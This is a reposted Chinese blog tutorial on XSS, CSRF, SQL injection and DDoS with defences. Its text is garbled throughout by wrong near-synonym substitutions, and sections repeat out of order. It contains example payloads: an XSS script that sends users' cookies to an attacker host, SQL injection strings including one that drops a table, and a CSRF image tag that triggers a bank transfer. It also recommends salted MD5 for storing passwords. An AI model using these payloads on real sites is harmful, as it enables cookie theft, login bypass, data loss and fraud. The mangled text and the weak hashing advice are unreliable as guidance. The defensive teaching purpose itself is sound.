被攻击的由。被口诛笔伐的由来。

 

本文简单介绍几栽常见的攻击手段及其防御措施

  • XSS(跨站脚论攻击)
  • CSRF(跨站请求伪造)
  • SQL注入
  • DDOS

本文简单介绍几种常见的抨击手段及其防御措施

  • XSS(跨站脚论攻击)
  • CSRF(跨站请求伪造)
  • SQL注入
  • DDOS

web安全系列目录

  • 总几栽常见web攻击手段极防御措施
  • 小结几种常见的安康算法

XSS

概念

  • 全是超站脚论攻击(Cross Site
    Scripting),指攻击者在网页中置放恶意脚本程序。

案列

  • 例如我写了一个博客网站,然后攻击者在地方公布了一个篇章,内容是这般的 <script>window.open(“www.gongji.com?param=”+document.cookie)</script>,如果本身从来不对客的始末开展处理,直接存储到数据库,那么下一致潮当其他用户访问他的就首文章的时,服务器从数据库读取后然后应给客户端,浏览器执行了及时段脚本,然后就是将该用户之cookie发送及攻击者的服务器了。

于口诛笔伐的因

  • 用户输入的数量变成了代码,比如说上面的<script>,应该仅仅是字符串却闹矣代码的图。

预防

  • 以输入的多少开展转义处理,比如说讲
    < 转义成&lt;

XSS

SQL注入

概念

  • 由此sql命令伪装成健康的http请求参数,传递到服务器端,服务器执行sql命令造成对数据库进行攻击

案例

  • ' or '1'= '1。这是太广的sql注入攻击,当我们输如用户名
    jiajun
    ,然后密码输如'or '1'= '1的时,我们当询问用户称以及密码是否科学的下,本来要实行的是select * from user where username='' and password='',经过参数拼接后,会履sql语句 select * from user where username='jaijun' and password=' ' or ' 1'='1 ',这个时候1=1凡是建立,自然就是超了证实了。
  • 而若重新严重一点,密码输如的是';drop table user;--,那么sql命令为select * from user where username='jiajun' and password='';drop table user;--' 这个时我们即便直接将这表给删除了

于口诛笔伐的案由

  • sql语句伪造参数,然后以针对参数进行拼接的继形成破坏性的sql语句,最后导致数据库被攻击

预防

  • 每当java中,我们可以应用预编译语句(PreparedStatement),这样的话即使我们用sql语句伪造成参数,到了服务端的下,这个伪造sql语句之参数为只是简单的字符,并无能够自及攻击的图。
  • 很多orm框架都得以针对参数进行转义
  • 举行最老的打算,即使吃’拖库‘(‘脱裤,数据库泄露’)。数据库被密码不应允公开存储的,可以针对密码使用md5进行加密,为了加大破解资金,所以可以行使加盐的(数据库存储用户名,盐(随机字符长),md5后底密文)方式。

概念

  • 齐全是跨站脚论攻击(Cross Site
    Scripting),指攻击者在网页中坐恶意脚本程序。

CSRF

概念

  • 齐是跨站请求伪造(cross site request
    forgery),指经伪装成受信赖用户的拓展访问,通俗的云即我顾了A网站,然后cookie存在了浏览器,然后自己以看了一个光棍网站,不小心点了流氓网站一个链接(向A发送请求),这个时流氓网站使用了我的身价对A进行了顾。

案列

  • 是例子可能具体中未见面有,但是攻击的点子是同一的。比如说我报到了A银行网站,然后自己而看了室友给的一个光棍网站,然后点了里面的一个链接 www.A.com/transfer?account=666&money=10000,那么是时刻大可能自己哪怕为账号也666的食指改变了1w软妹币
  • 专注这个攻击方式不必然是我沾了是链接,也足以是这个网站中有资源要对了这个转账链接,比如说一个<img
    src=”http://www.A.com/transfer?account=666&money=10000″>

让口诛笔伐的缘故

  • 用户本地存储cookie,攻击者利用用户之cookie进行认证,然后伪造用户发出请求

预防

  • 就此为攻击是以攻击者利用了蕴藏于浏览器用于用户征的cookie,那么要我们不用cookie来证实不纵足以预防了。所以我们得以利用token(不存储于浏览器)认证。
  • 通过referer识别,HTTP
    Referer是header的同一有,当浏览器为web服务器发送请求的时刻,一般会带来上Referer,告诉服务器本身是自从哪个页面链接过来的,服务器基此可以得有音讯用于拍卖。那么这样的话,我们务必登录银行A网站才会开展转发了。

案列

  • 譬如我写了一个博客网站,然后攻击者在面公布了一个篇,内容是这么的
    <script>window.open(“www.gongji.com?param=”+document.cookie)</script>,如果自己从没指向客的情节进行处理,直接存储到数据库,那么下一样不成当其他用户访问他的这首文章的下,服务器从数据库读取后然后应给客户端,浏览器执行了这段脚本,然后便管该用户之cookie发送及攻击者的服务器了。

DDOS

概念

  • 分布式拒绝服务攻击(Distributed
    Denial of
    Service),简单说哪怕是发送大量要是一旦服务器瘫痪。DDos攻击是当DOS攻击基础及之,可以初步明了,dos是独挑,而ddos是群殴,因为现代技能之进步,dos攻击的杀伤力降低,所以出现了DDOS,攻击者借助公共网络,将十分数量的计算机设备并起来,向一个或多独对象进行抨击。

案例

  • SYN Flood
    ,简单说一下tcp三赖握手,客户端先服务器发出请求,请求建立连接,然后服务器返回一个报文,表明要以让奉,然后客户端也会见回一个报文,最后建立连接。那么一旦有这样一栽情况,攻击者伪造ip地址,发出报文给服务器请求连接,这个上服务器接受到了,根据tcp三涂鸦握手的规则,服务器也只要回答一个报文,可是这ip是假冒之,报文回应被何人吧,第二次于握手出现谬误,第三坏当吧不怕不克顺利进行了,这个上服务器收不交第三次握手时客户端起的报文,又还重第二浅握手的操作。如果攻击者伪造了汪洋的ip地址并发出请求,这个时服务器将保障一个良很的半连接等待列表,占用了大量的资源,最后服务器瘫痪。
  • CC攻击,在动层http协议达成发起攻击,模拟正常用户发送大量请求直到该网站拒绝服务为止。

给攻击的原故

  • 服务器带富不足,不可知挡住攻击者的口诛笔伐流量

预防

  • 最为直接的法子增加拉动富。但是攻击者用到处的微处理器进行攻击,他的拉动富不会见消耗成千上万钱,但于服务器来说,带富非常昂贵。
  • 摆服务提供商有好的同仿照完整DDoS解决方案,并且能够提供丰富的拉动富资源

叫口诛笔伐的原故

  • 用户输入的数化了代码,比如说上面的<script>,应该单独是字符串却闹了代码的作用。

总结

  • 面一共涉及了4受攻击方式,分别是xss攻击(关键是本子,利用恶意脚论发起攻击),CSRF攻击(关键是靠地方cookie进行验证,伪造发送请求),SQL注入(关键是由此用sql语句伪造参数有攻击),DDOS攻击(关键是经过手段来大气请求,最后使服务器崩溃)
  • 用攻击者能得逞攻击,用户操作是一个因,服务器端没有办好防御是一个问题,因为无法控制用户的操作,所以用我们服务器端的开做好防御。
  • 莫当绝对安全,只要再安全。

 

参照博客:http://www.cnblogs.com/-new/p/7135814.html

预防

  • 将输入的数码开展转义处理,比如说讲 < 转义成&lt;

SQL注入

概念

  • 经过sql命令伪装成健康的http请求参数,传递到服务器端,服务器执行sql命令造成对数据库进行抨击

案例

  • ' or '1'= '1。这是最广泛的sql注入攻击,当我们输如用户名 jiajun
    ,然后密码输如'or '1'= '1的早晚,我们于询问用户称及密码是否是的时光,本来要尽之是select * from user where username='' and password='',经过参数拼接后,会履行sql语句
    select * from user where username='jaijun' and password=' ' or ' 1'='1 ',这个时刻1=1凡是建立,自然就跨了证实了。
  • 可只要再次重一点,密码输如的是';drop table user;--,那么sql命令为select * from user where username='jiajun' and password='';drop table user;--'
    这个时候咱们虽直将这表给删除了

于攻击的由来

  • sql语句伪造参数,然后以对参数进行拼接的继形成破坏性的sql语句,最后造成数据库中攻击

预防

  • 当java中,我们得行使预编译语句(PreparedStatement),这样的话即使我们以sql语句伪造成参数,到了服务端的时光,这个伪造sql语句的参数为只是简单的字符,并无能够打至攻击的图。
  • 成百上千orm框架都好本着参数进行转义
  • 开最好充分之打算,即使给’拖库‘(‘脱裤,数据库泄露’)。数据库被密码无应公开存储的,可以针对密码使用md5进展加密,为了加大破解资金,所以可以用加盐的(数据库存储用户名,盐(随机字符长),md5后底密文)方式。

CSRF

概念

  • 齐全是跨站请求伪造(cross site request
    forgery),指经伪装成于信赖用户的展开走访,通俗的说即我看了A网站,然后cookie存在了浏览器,然后我又看了一个光棍网站,不小心点了流氓网站一个链接(向A发送请求),这个时刻流氓网站采取了我之位置对A进行了拜访。

案列

  • 这个事例可能具体中无会见存在,但是攻击的措施是一模一样的。比如说我登录了A银行网站,然后自己而走访了室友给的一个光棍网站,然后点了中的一个链接
    www.A.com/transfer?account=666&money=10000,那么是时刻非常可能我哪怕为账号也666的人头改了1w软妹币
  • 在意是攻击方式不必然是自身碰了此链接,也得以是这个网站中有些资源要对了是转账链接,比如说一个<img
    src=”http://www.A.com/transfer?account=666&money=10000″>

受攻击的由来

  • 用户本地存储cookie,攻击者利用用户的cookie进行认证,然后伪造用户发出请求

预防

  • 用被攻击是为攻击者利用了仓储于浏览器用于用户征的cookie,那么要我们绝不cookie来证明不纵可防范了。所以我们可以利用token(不存储于浏览器)认证。
  • 透过referer识别,HTTP
    Referer是header的平片段,当浏览器为web服务器发送请求的时光,一般会带来达Referer,告诉服务器本身是自从哪个页面链接过来的,服务器基此可以取得部分信用于拍卖。那么这样的话,我们务必登录银行A网站才能够进行转发了。

DDOS

概念

  • 分布式拒绝服务攻击(Distributed Denial of
    Service),简单说即使是殡葬大量伸手是一旦服务器瘫痪。DDos攻击是以DOS攻击基础及的,可以初步明了,dos是止挑,而ddos是群殴,因为现代技术的进化,dos攻击的杀伤力降低,所以出现了DDOS,攻击者借助公共网络,将异常数目之微处理器设备并起来,向一个要多独对象展开抨击。

案例

  • SYN Flood
    ,简单说一下tcp三破握手,客户端先服务器发出请求,请求建立连接,然后服务器返回一个报文,表明要以让接受,然后客户端也会见回来一个报文,最后建立连接。那么要发诸如此类一种状态,攻击者伪造ip地址,发出报文给服务器请求连接,这个时候服务器接受到了,根据tcp三糟糕握手的平整,服务器也要对一个报文,可是此ip是鱼目混珠之,报文回应让何人为,第二次等握手出现谬误,第三不成当吧不怕不能够顺利进行了,这个时节服务器收不顶第三差握手时客户端起之报文,又更重新第二软握手的操作。如果攻击者伪造了汪洋底ip地址并发出请求,这个时候服务器将保护一个百般可怜之半连接等待列表,占用了汪洋底资源,最后服务器瘫痪。
  • CC攻击,在运用层http协议及发起攻击,模拟正常用户发送大量央直到该网站拒绝服务为止。

于攻击的由

  • 服务器带富不足,不克挡攻击者的抨击流量

预防

  • 不过直白的计增加带动富。但是攻击者用到处之微机进行抨击,他的带来富不见面吃成千上万钱,但对此服务器来说,带富非常昂贵。
  • 谈服务提供商有投机的同等仿照完整DDoS解决方案,并且能提供丰富的带动富资源

总结

  • 面一共涉及了4负攻击方式,分别是xss攻击(关键是本子,利用恶意脚论发起攻击),CSRF攻击(关键是乘当地cookie进行说明,伪造发送请求),SQL注入(关键是通过用sql语句伪造参数有攻击),DDOS攻击(关键是透过手段有大气求,最后使服务器崩溃)
  • 因此攻击者能成功攻击,用户操作是一个因,服务器端没有做好防御是一个题目,因为无法控制用户之操作,所以要我们服务器端的出做好防御。
  • 未曾当绝对安全,只要再安全。

转自: http://www.cnblogs.com/-new/p/7135814.html

相关文章